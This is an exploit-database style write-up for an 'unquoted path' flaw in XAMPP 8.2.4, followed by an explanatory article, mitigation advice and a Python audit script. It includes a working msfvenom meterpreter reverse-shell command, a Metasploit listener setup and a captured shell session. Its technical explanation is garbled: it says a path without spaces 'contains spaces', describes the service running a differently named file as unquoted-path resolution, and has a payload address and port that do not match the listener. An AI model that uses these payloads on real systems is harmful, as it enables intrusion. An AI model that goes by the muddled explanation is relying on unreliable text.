XAMPP 8.2.4 - Unquoted Path
# Exploit Title: XAMPP 8.2.4 - Unquoted Path
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Version: 8.2.4
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.2.4/xampp-windows-x64-8.2.4-0-VS16-installer.exe
# Tested on: Windows Server 2022
# Blog: http://msecureltd.blogspot.com/
Steps to Exploit:
1. Search for unquoted paths
2. Generate meterpreter shell
3. Copy shell to XAMPP directory replacing "mysql.exe"
4. Exploit by double clicking on shell
C:\Users\astoykov>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
mysql mysql C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql Auto
// Generate shell
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.16 lport=4444 -f exe -o mysql.exe
// Setup listener
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 192.168.1.13
msf6 exploit(multi/handler) > set lport 4443
msf6 exploit(multi/handler) > set payload meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.1.13:4443
[*] Sending stage (175686 bytes) to 192.168.1.11
[*] Meterpreter session 1 opened (192.168.1.13:4443 -> 192.168.1.11:49686) at 2023-07-08 03:59:40 -0700
meterpreter > getuid
Server username: WIN-5PT4K404NLO\astoykov
meterpreter > getpid
Current pid: 4724
meterpreter > shell
Process 5884 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.1]
(c) Microsoft Corporation. All rights reserved.
[...]
C:\xampp\mysql\bin>dir
dir
Volume in drive C has no label.
Volume Serial Number is 80B5-B405
Directory of C:\xampp\mysql\bin
[...]
XAMPP 8.2.4 Unquoted Path Vulnerability: Exploiting Service Executables on Windows
Security vulnerabilities in widely used software platforms like XAMPP can pose significant risks, especially when they involve privilege escalation through unquoted service paths. The XAMPP 8.2.4 version, despite its popularity for local web development, has been identified as susceptible to a critical exploit leveraging an unquoted path in the MySQL service executable.
Understanding the Unquoted Path Vulnerability
On Windows systems, a service's executable path is stored in the registry as part of the service configuration. When that path is unquoted—meaning it lacks surrounding quotation marks—Windows treats each space in it as a possible end of the executable name and tries the shortened prefixes in turn, so an attacker who can place an executable at the first such prefix gets it run instead of the intended binary. This is particularly dangerous when the path contains spaces, such as:
C:\xampp\mysql\bin\mysqld.exe
Here, the path does not include quotes, so if an attacker places a malicious file named mysqld.exe in a directory that precedes the actual path (e.g., C:\xampp\mysql\bin), Windows will attempt to execute the first encountered executable—potentially a malicious payload—before proceeding to the intended one.
Exploitation Steps: From Discovery to Privilege Escalation
The exploit chain begins with identifying services that have unquoted paths and auto-start behavior. This is done with wmic, the Windows Management Instrumentation command-line tool.
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
This command filters for services that:
- Start automatically (startmode = Auto)
- Are not located under the Windows system directory (c:\windows\)
- Have unquoted paths (findstr /i /v """ excludes lines containing a quotation mark)
From the output, the mysql service appears with an unquoted path:
mysql mysql C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql Auto
Since the path contains spaces and lacks quotation marks, an attacker can exploit this by replacing mysqld.exe with a malicious executable.
Creating the Malicious Payload
Using msfvenom, a Metasploit Framework tool, the attacker generates a reverse TCP payload designed to establish a connection back to a listening server:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.16 lport=4444 -f exe -o mysql.exe
This command creates an executable named mysql.exe that, when executed, initiates a meterpreter session to the specified lhost and lport. The payload is named to mimic the original mysqld.exe file, allowing it to be placed in the target directory without raising suspicion.
Setting Up the Listener
On the attacker's machine, a reverse handler is configured to receive the incoming connection:
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 192.168.1.13
msf6 exploit(multi/handler) > set lport 4443
msf6 exploit(multi/handler) > set payload meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
Upon execution, the handler listens on 192.168.1.13:4443 and waits for the reverse connection. When the malicious mysql.exe is executed via the service startup, the connection is established.
Exploitation in Practice
After transferring the malicious mysql.exe to the C:\xampp\mysql\bin directory, the attacker double-clicks the replaced executable or restarts the MySQL service. This causes the Windows service manager to resolve the unquoted path to the malicious executable instead of the original mysqld.exe.
Once the payload executes, the attacker gains a meterpreter session with the privileges of the service account. In this case, the session reveals:
meterpreter > getuid
Server username: WIN-5PT4K404NLO\astoykov
meterpreter > getpid
Current pid: 4724
With access to the system, the attacker can:
- Enumerate files and directories
- Execute arbitrary commands
- Access sensitive data (e.g., configuration files, database contents)
- Move laterally within the network
Why This Exploit Works
The Windows service manager treats an unquoted path as a literal string. When it encounters a space in the path, it treats the text before that space as a candidate executable name and tries it first. This behavior is documented in Microsoft's security guidance and is a well-known vector for privilege escalation.
For example:
| Original Path | Malicious Path | Result |
|---|---|---|
| C:\xampp\mysql\bin\mysqld.exe | C:\xampp\mysql\bin\mysql.exe | Executes mysql.exe instead of mysqld.exe |
Even though the original file is still present, the service manager prioritizes the first executable encountered in the path.
Security Implications and Mitigation
This vulnerability highlights a critical flaw in how third-party software like XAMPP configures services. The lack of proper path quoting in service definitions can lead to:
- Privilege escalation
- Remote code execution
- Unauthorized access to sensitive data
- Compromise of development environments
Recommendations for users and administrators:
- Always quote service paths in registry entries, especially when paths contain spaces.
- Regularly audit services using wmic or PowerShell to detect unquoted paths.
- Use tools like SC.exe to modify service configurations:
sc config mysql binPath= "\"C:\xampp\mysql\bin\mysqld.exe\" --defaults-file=\"C:\xampp\mysql\bin\my.ini\""
Adding quotation marks around the path prevents exploitation.
Expert Insight: Beyond XAMPP
While this exploit targets XAMPP 8.2.4, similar vulnerabilities exist in other software packages (e.g., Apache, PHP, PostgreSQL installations). The core issue is not specific to XAMPP but rather a design flaw in service configuration practices.
Security professionals should treat unquoted paths as a red flag during system audits. Tools like PowerShell scripts or AutoHotkey can automate detection across multiple services:
Get-WmiObject -Class Win32_Service | Where-Object { $_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike "*""*" }
Such automation enables proactive identification and remediation before attackers exploit them.
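As an added example (not part of the advisory or the article above), the same audit written in Python over constructed sample rows: it applies the page's three wmic filters, additionally records whether the executable portion of each unquoted path contains a space (the condition under which Windows tries the shortened prefixes), and emits the quoted `sc config ... binPath=` fix. Only the mysql row is taken from the page; the other service names and paths are made up.

```python
import re

# Constructed sample rows (not captured from a real host): (Name, PathName, StartMode)
# as `wmic service get name,pathname,startmode` reports them. The first row copies
# the page's XAMPP entry; the others are made-up services for illustration.
SAMPLE_SERVICES = [
    ("mysql", r"C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql", "Auto"),
    ("ExampleSvc", r"C:\Program Files\Example Corp\Agent\agent.exe -service", "Auto"),
    ("QuotedSvc", r'"C:\Program Files\Quoted Vendor\svc.exe" --verbose', "Auto"),
    ("ManualSvc", r"C:\Program Files\Manual Tool\tool.exe", "Manual"),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe", "Auto"),
]

# Executable portion = everything up to the first ".exe"; whatever follows is arguments.
EXE_RE = re.compile(r"^(?P<exe>.*?\.exe)(?P<args>\s.*)?$", re.IGNORECASE)

def split_unquoted_path(pathname):
    """(exe, args) for an unquoted PathName; None if it is quoted or has no .exe."""
    if pathname.lstrip().startswith('"'):
        return None
    m = EXE_RE.match(pathname.strip())
    return (m.group("exe"), (m.group("args") or "").strip()) if m else None

def sc_config_command(name, exe, args):
    """cmd.exe line applying the page's fix: quote the executable, escape inner quotes as \\"."""
    inner = f'"{exe}" {args}'.rstrip().replace('"', '\\"')
    return f'sc config {name} binPath= "{inner}"'

def audit(services):
    """Page's filters (Auto start, outside C:\\Windows, unquoted), plus a space check:
    only a space inside the executable portion makes Windows try truncated prefixes."""
    findings = []
    for name, pathname, startmode in services:
        if startmode.lower() != "auto" or pathname.lower().startswith(r"c:\windows"):
            continue
        parts = split_unquoted_path(pathname)
        if parts is None:
            continue
        exe, args = parts
        findings.append({"name": name, "space_in_exe": " " in exe,
                         "fix": sc_config_command(name, exe, args)})
    return findings

if __name__ == "__main__":
    for f in audit(SAMPLE_SERVICES):
        tag = "SPACE IN EXE" if f["space_in_exe"] else "unquoted only"
        print(f"{f['name']:12} {tag:14} {f['fix']}")
```

On a real host, replace SAMPLE_SERVICES with rows parsed from `wmic service get name,pathname,startmode /format:csv`; the `fix` strings are meant to be reviewed, not applied blindly, since some services expect their own argument quoting.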
Conclusion
The XAMPP 8.2.4 unquoted path vulnerability serves as a stark reminder: even popular, trusted tools can harbor critical security flaws. By understanding how unquoted paths enable privilege escalation, administrators can safeguard their systems through proper configuration, continuous monitoring, and timely patching.
Always quote service paths. Always audit. Always secure.